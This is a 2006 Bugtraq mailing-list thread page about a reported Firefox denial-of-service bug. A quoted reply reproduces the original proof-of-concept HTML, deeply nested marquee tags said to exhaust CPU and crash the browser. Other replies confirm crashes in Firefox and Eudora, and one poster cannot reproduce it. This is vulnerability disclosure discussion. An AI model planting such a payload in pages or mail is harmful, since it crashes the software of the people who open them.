SecurityFocus

Fire fox dos exploit May 30 2006 12:03PM
co296 aol com (2 replies)

Re: Fire fox dos exploit May 31 2006 02:50PM
Josh Zlatin-Amishav (josh tkos co il) (5 replies)

Re: Fire fox dos exploit Jun 01 2006 08:00PM
Aaron Hopkins (lists die net)

Re: Fire fox dos exploit May 31 2006 08:14PM
Phil Trainor (ptrainor imperfectnetworks com)

Re: Fire fox dos exploit May 31 2006 05:28PM
Yannick von Arx (yannick vonarx yanux ch)

Re: Fire fox dos exploit May 31 2006 05:08PM
Ronald van den Blink (ronald securityview org)

RE: Fire fox dos exploit May 31 2006 04:22PM
Andy (andy nds uk com) (1 replies)

RE: Fire fox dos exploit Jun 05 2006 03:49AM
Sanjay Rawat (sanjayr intoto com) (1 replies)

I have seen that the exploit also freezes Eudora 6.2.1.2. I was trying to
open the original mail in Eudora mail client and whenever I clicked on the
the mail , Eudora stopped responding anymore. I had to restart the application.

regards
-Sanjay Rawat

At 09:52 PM 5/31/2006, Andy wrote:
>Crashed my FF 1.5.0.3 straight away on a fully patched XP Pro Service Pack 2
>
>Andy
>
>-----Original Message-----
>From: Josh Zlatin-Amishav [mailto:josh (at) tkos.co (dot) il [email concealed]]
>Sent: 31 May 2006 16:50
>To: co296 (at) aol (dot) com [email concealed]
>Cc: bugtraq (at) securityfocus (dot) com [email concealed]
>Subject: Re: Fire fox dos exploit
>
>On Tue, 30 May 2006, co296 (at) aol (dot) com [email concealed] wrote:
>
> > I have found a problem which causes denial of service on fire fox browser
>
>Can you give us some more details, like versions and platforms affected? I
>was unable to
>recreate this flaw using firefox 1.5.dfsg+1.5.0 on Debian unstable.
>
>--
> - Josh
>
> >
> > Creadit:to n00b for finding this bug..
> >
> > the problem lie's in the
> >
> > <marquee> html tag uses 100% cpu and crash's the browser..
> >
> > Following proof of concept available
> >
> > <html>
> > <head>
> > <title>Credit to n00b..</title>
> > <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
> > </head>
> >
> > <body>
> >
><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee
><mar
>quee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><ma
rquee
> ><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee
><ma
>rquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><m
arque
>e><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marqu
ee><m
>arquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><
marqu
>ee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marq
uee><
>marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marq
>uee></marquee></marquee></marquee></marquee></marquee></marquee></marqu
ee></
>marquee></marquee></marquee></marquee></marquee></marquee></marquee></m
arque
>e></marquee></marquee></marquee></marquee></marquee></marquee></marquee
></ma
>rquee></marquee></marquee></marquee></marquee></marquee></marquee></mar
quee>
></marquee></marquee></marquee></marquee></marquee></marquee></marquee><
/marq
> ue
> >
>e></marquee></marquee></marquee></marquee></marquee></marquee></marquee
></ma
>rquee></marquee></marquee></marquee></marquee></marquee></marquee></mar
quee>
></marquee></marquee></marquee></marquee></marquee></marquee></marquee><
/marq
>uee></marquee></marquee></marquee></marquee></marquee></marquee></marqu
ee>
> > </body>
> > </html>
> >
> >

[ reply ]

RE: Fire fox dos exploit Jun 07 2006 10:43AM
Jaroslaw Sajko (sloik parareal net)

Re: Fire fox dos exploit May 31 2006 01:59PM
pagvac (unknown pentester gmail com)